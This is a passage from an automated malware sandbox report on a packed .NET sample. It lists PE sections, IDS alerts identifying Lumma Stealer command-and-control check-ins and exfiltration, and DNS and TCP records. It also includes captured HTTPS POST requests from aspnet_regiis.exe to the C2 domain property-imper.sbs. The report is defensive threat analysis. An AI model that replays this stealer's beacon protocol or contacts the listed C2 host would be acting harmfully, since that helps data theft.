IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb4000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x90000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
:Mn-oI	0x2000	0x8c98c	0x8ca00	1ab09b14d3dbfdc059bd49fc2947560e	False	1.0003229166666667	data	7.999720145209283	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x90000	0x1eff0	0x1f000	72ad4c680ba28314ecf963c2be37a720	False	0.33025926159274194	data	4.699091743541759	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0x648	0x800	8689ea0f3271b875c875b5a266292e7d	False	0.35009765625	data	3.5584555018467214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0xc	0x200	49ba7a9e1e9d0fde8dd025f5fdb99dfe	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xb4000	0x10	0x200	54642790ec25e4b4619777896321dc7f	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb00a0	0x3bc	data			0.42782426778242677
RT_MANIFEST	0xb045c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T15:10:01.104987+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:10:02.212063+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:10:02.212063+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:10:03.519144+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:10:04.247214+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:10:04.247214+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:10:05.776218+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.33.116	443	TCP
2024-11-23T15:10:07.941534+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.33.116	443	TCP
2024-11-23T15:10:08.719900+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49737	104.21.33.116	443	TCP
2024-11-23T15:10:10.120985+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.33.116	443	TCP
2024-11-23T15:10:12.511308+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.33.116	443	TCP
2024-11-23T15:10:14.988079+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.33.116	443	TCP
2024-11-23T15:10:18.531857+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	104.21.33.116	443	TCP
2024-11-23T15:10:19.241279+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49746	104.21.33.116	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:09:59.883140087 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:09:59.883191109 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:09:59.883259058 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:09:59.886476040 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:09:59.886490107 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:01.104914904 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:01.104986906 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:01.109673977 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:01.109688044 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:01.109975100 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:01.159953117 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:01.469266891 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:01.469288111 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:01.469413996 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:02.212073088 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:02.212156057 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:02.212209940 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:02.214615107 CET	49730	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:02.214627981 CET	443	49730	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:02.260185957 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:02.260271072 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:02.260365009 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:02.260618925 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:02.260653019 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:03.518970013 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:03.519144058 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:03.520622015 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:03.520656109 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:03.520903111 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:03.522027016 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:03.522073984 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:03.522120953 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.247198105 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.247263908 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.247293949 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.247328997 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.247378111 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.247431040 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.247447014 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.255078077 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.255125999 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.255141973 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.263561010 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.263612986 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.263629913 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.316181898 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.316215038 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.363059998 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.366835117 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.409934998 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.409957886 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.448012114 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.448108912 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.448132038 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.448156118 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.448331118 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.454929113 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.454966068 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.454994917 CET	49732	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.455013037 CET	443	49732	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.559720039 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.559768915 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:04.559865952 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.560204029 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:04.560235023 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:05.776143074 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:05.776217937 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:05.777612925 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:05.777636051 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:05.777983904 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:05.784682035 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:05.784806967 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:05.784858942 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:05.784941912 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:05.784959078 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:06.616334915 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:06.616446972 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:06.616513968 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:06.616631031 CET	49734	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:06.616658926 CET	443	49734	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:06.680558920 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:06.680619955 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:06.680697918 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:06.680960894 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:06.680998087 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:07.941416979 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:07.941534042 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:07.942811966 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:07.942837000 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:07.943181038 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:07.944422960 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:07.944586039 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:07.944633007 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:08.719927073 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:08.720046997 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:08.720113993 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:08.720180035 CET	49737	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:08.720232964 CET	443	49737	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:08.905828953 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:08.905881882 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:08.905973911 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:08.906431913 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:08.906471968 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.120862961 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.120985031 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.122045040 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.122075081 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.122416019 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.129122972 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.129287958 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.129338026 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.129420996 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.129437923 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.995233059 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.995347977 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:10.995410919 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.995512009 CET	49739	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:10.995539904 CET	443	49739	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:11.221872091 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:11.221910954 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:11.221982956 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:11.222280979 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:11.222295046 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:12.511120081 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:12.511307955 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:12.512429953 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:12.512438059 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:12.512753963 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:12.520781994 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:12.520878077 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:12.520881891 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:13.261084080 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:13.261193991 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:13.261249065 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:13.261347055 CET	49741	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:13.261363983 CET	443	49741	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:13.682235003 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:13.682269096 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:13.682342052 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:13.682617903 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:13.682634115 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:14.987919092 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:14.988079071 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:14.989691973 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:14.989700079 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:14.989911079 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.003196001 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.004092932 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.004127979 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.004389048 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.004415035 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005047083 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.005091906 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005233049 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.005261898 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005415916 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.005446911 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005650997 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.005677938 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005686045 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.005702019 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005861044 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.005893946 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.005911112 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.006392956 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.006422043 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.051327944 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.051523924 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.051548958 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.051568985 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.051587105 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.051601887 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.051609993 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:15.051635981 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:15.051646948 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:17.291263103 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:17.291394949 CET	443	49743	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:17.291529894 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:17.291567087 CET	49743	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:17.315634012 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:17.315686941 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:17.315767050 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:17.316055059 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:17.316083908 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:18.531761885 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:18.531857014 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:18.533045053 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:18.533078909 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:18.533437014 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:18.534847975 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:18.534888029 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:18.534940958 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:19.241282940 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:19.241364956 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:19.241446018 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:19.242288113 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:19.242335081 CET	443	49746	104.21.33.116	192.168.2.4
Nov 23, 2024 15:10:19.242367029 CET	49746	443	192.168.2.4	104.21.33.116
Nov 23, 2024 15:10:19.242382050 CET	443	49746	104.21.33.116	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:09:59.736027002 CET	65385	53	192.168.2.4	1.1.1.1
Nov 23, 2024 15:09:59.876187086 CET	53	65385	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 15:09:59.736027002 CET	192.168.2.4	1.1.1.1	0xdbf2	Standard query (0)	property-imper.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 15:09:59.876187086 CET	1.1.1.1	192.168.2.4	0xdbf2	No error (0)	property-imper.sbs		104.21.33.116	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:09:59.876187086 CET	1.1.1.1	192.168.2.4	0xdbf2	No error (0)	property-imper.sbs		172.67.162.84	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

property-imper.sbs

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:01 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: property-imper.sbs
2024-11-23 14:10:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 14:10:02 UTC	1020	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cold0k4j4idcpfdsv2rlrka124; expires=Wed, 19-Mar-2025 07:56:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8oXSKYOVnW8n60ZsQK9CERxFYw68Xol1%2F0Qvv%2BBbTY9yk%2Fe236GdYa%2FGaBX2S4hOcHakNiM%2Bl9pjwBr22j044aQXpUgWXLjKXBbUqoEqcl%2BKS0ZkR8VbTdawbZCVTzFU97bAasw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bd882f1b4232-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1629&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1759036&cwnd=205&unsent_bytes=0&cid=3a9b3ac31200770e&ts=1118&x=0"
2024-11-23 14:10:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 14:10:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:03 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: property-imper.sbs
2024-11-23 14:10:03 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6642475507&j=
2024-11-23 14:10:04 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dhodt07qem4gpne6muirj74c68; expires=Wed, 19-Mar-2025 07:56:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9Axxr8kULaOLkTys7Qkvln7TpZJQ6sQj%2BsPkVOSFbR4e1AyweiikOWgWTG9uILBcPqH6ZmCC258ZXph4XWKusaFuAxaXVcoHG%2FXmPBOaycktqELPMOnzyktmRI096W6zDxmaro%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bd95b99f43cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2164&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1345002&cwnd=252&unsent_bytes=0&cid=e8e2cbb2eccff936&ts=734&x=0"
2024-11-23 14:10:04 UTC	358	IN	Data Raw: 34 64 36 0d 0a 46 62 4a 33 50 66 75 67 67 74 43 34 52 56 6c 44 44 6c 58 45 70 54 58 46 31 2f 6e 2f 63 30 35 6d 4a 43 69 76 49 5a 4b 39 69 34 68 75 6b 41 45 66 77 5a 53 75 38 73 73 67 65 33 6c 36 4a 37 48 41 47 65 65 32 6e 64 31 4a 4b 41 64 49 57 38 6f 4e 73 4d 76 6d 71 69 2f 55 46 6c 47 49 78 61 37 79 33 54 31 37 65 56 55 75 35 73 42 62 35 2b 33 62 6d 68 6b 73 42 30 68 4b 7a 6b 72 39 7a 65 66 72 66 64 34 51 56 5a 37 44 35 72 48 55 4b 44 77 6d 61 7a 53 75 79 31 79 6f 76 35 54 64 58 32 77 44 58 67 71 56 41 39 2f 59 2f 2b 6c 59 30 77 52 57 32 64 32 75 71 35 6f 67 4e 32 45 30 64 36 58 41 56 36 6d 78 6e 5a 51 62 4a 67 35 41 53 38 74 4c 34 74 54 74 34 48 33 51 45 31 53 55 79 76 4b 38 33 69 38 33 49 47 45 30 35 6f 6b 58 6f 4b 33 62 78 56 46 2f 4e 6b 56 62 33 46 Data Ascii: 4d6FbJ3PfuggtC4RVlDDlXEpTXF1/n/c05mJCivIZK9i4hukAEfwZSu8ssge3l6J7HAGee2nd1JKAdIW8oNsMvmqi/UFlGIxa7y3T17eVUu5sBb5+3bmhksB0hKzkr9zefrfd4QVZ7D5rHUKDwmazSuy1yov5TdX2wDXgqVA9/Y/+lY0wRW2d2uq5ogN2E0d6XAV6mxnZQbJg5AS8tL4tTt4H3QE1SUyvK83i83IGE05okXoK3bxVF/NkVb3F
